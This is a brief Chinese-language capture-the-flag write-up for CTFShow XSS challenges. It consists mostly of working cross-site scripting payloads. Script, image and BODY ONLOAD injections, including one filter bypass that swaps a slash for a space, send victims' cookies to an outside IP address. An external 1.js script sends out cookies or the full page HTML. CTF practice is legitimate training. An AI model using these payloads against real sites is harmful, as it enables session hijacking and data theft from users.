CTFShow-XSS

web316 反弹cookie到vps

1
2
3
<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;alert(/success/);</script>

<script>window.open('http://91.67.253.121:1237/?cookie='+document.cookie)</script>

1612952403326

web317-319 新姿势

1
<BODY ONLOAD=document.location='http://91.67.253.121:1237?cookie='+document.cookie;>

web320 过滤空格

1
<BODY/ONLOAD=document.location='http://91.67.253.121:1237?cookie='+document.cookie;>

328

用户名存在xss

找了几个xss平台好像都没什么用

1
<script src="http://91.67.253.121:1237/1.js"></script>

1.js

1
2
3
var img = new Image();
img.src = "http://91.67.253.121:1237/?cookie="+document.cookie;
document.body.append(img);

329

1.js

1
2
3
var img = new Image();
img.src = "http://91.67.253.121:1237/?cookie="+document.getElementsByTagName('html')[0].innerHTML;
document.body.append(img);
1
<script src="http://91.67.253.121:1237/1.js"></script>

会把整个html返回,然后找到flag

1613011316572

332

1612972060218

333

自己给自己转账,burp跑